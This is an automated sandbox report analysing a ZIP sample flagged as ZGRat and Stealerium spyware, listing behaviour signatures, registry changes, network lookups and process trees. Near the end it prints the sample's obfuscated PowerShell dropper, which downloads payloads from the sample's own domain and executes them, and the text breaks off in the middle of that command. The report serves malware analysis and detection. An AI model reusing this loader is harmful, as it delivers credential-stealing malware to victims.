Malware Analysis Report

2024-10-19 06:53

Sample ID 240119-y3w7hsdee7
Target magic.poisontoolz.com.zip
SHA256 84765d5c0c038297793d431f04f2096bfce69ca41c50696c36bc0f3ba1369c05
Tags
zgrat rat spyware stealer stealerium collection
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

84765d5c0c038297793d431f04f2096bfce69ca41c50696c36bc0f3ba1369c05

Threat Level: Known bad

The file magic.poisontoolz.com.zip was found to be: Known bad.

Malicious Activity Summary

zgrat rat spyware stealer stealerium collection

Stealerium

ZGRat

Detect ZGRat V1

Blocklisted process makes network request

Downloads MZ/PE file

Drops startup file

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Accesses Microsoft Outlook profiles

Enumerates connected drives

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious use of FindShellTrayWindow

outlook_office_path

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Checks processor information in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-19 20:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

93s

Max time network

149s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Jafxaspdhim.vdf

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Jafxaspdhim.vdf

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 55.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:24

Platform

win10v2004-20231215-en

Max time kernel

156s

Max time network

174s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\fox.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\yagacrypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\yagacrypt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ggiac.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ggiac.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1748 wrote to memory of 1868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1868 wrote to memory of 2996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 1868 wrote to memory of 2996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 1868 wrote to memory of 2996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 1868 wrote to memory of 4080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\yagacrypt.exe
PID 1868 wrote to memory of 4080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\yagacrypt.exe
PID 1868 wrote to memory of 4080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\yagacrypt.exe
PID 2996 wrote to memory of 2116 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2996 wrote to memory of 2116 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2996 wrote to memory of 2116 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\fox.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hPhLUO($gYYfVUqro, $TDHCoMacW){[IO.File]::WriteAllBytes($gYYfVUqro, $TDHCoMacW)};function OuyjBhDPrdGwPbLI($gYYfVUqro){if($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38832,38840,38840))) -eq $True){rundll32.exe $gYYfVUqro }elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38844,38847,38781))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gYYfVUqro}elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38841,38847,38837))) -eq $True){misexec /qn /i $gYYfVUqro}else{Start-Process $gYYfVUqro}};function wZPwXqcGcNksDcvtMGB($uyaYBkDZCCSyzJDelsei){$iFRLJMGtgESMZFs = New-Object (bGYiXoWxyxIAMYfHnL @(38810,38833,38848,38778,38819,38833,38830,38799,38840,38837,38833,38842,38848));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$TDHCoMacW = $iFRLJMGtgESMZFs.DownloadData($uyaYBkDZCCSyzJDelsei);return $TDHCoMacW};function bGYiXoWxyxIAMYfHnL($NWBOMT){$RZDKPliAxJ=38732;$BhXTohPOo=$Null;foreach($eKsxkGZtQqIkdSPR in $NWBOMT){$BhXTohPOo+=[char]($eKsxkGZtQqIkdSPR-$RZDKPliAxJ)};return $BhXTohPOo};function gNBuaXtjuReBmDfHma(){$hIYbSEpsSJoZXPH = $env:AppData + '\';$YQPfBhOhZMdWRyHeqKPdf = $hIYbSEpsSJoZXPH + 'RIB.pdf';If(Test-Path -Path $YQPfBhOhZMdWRyHeqKPdf){Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;}Else{ $arPZzcSlEyncTeAIE = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38814,38805,38798,38778,38844,38832,38834));hPhLUO $YQPfBhOhZMdWRyHeqKPdf $arPZzcSlEyncTeAIE;Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;};$RYunDk = $hIYbSEpsSJoZXPH + 'yagacrypt.exe'; if (Test-Path -Path $RYunDk){OuyjBhDPrdGwPbLI $RYunDk;}Else{ $ehQGZXVzn = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL 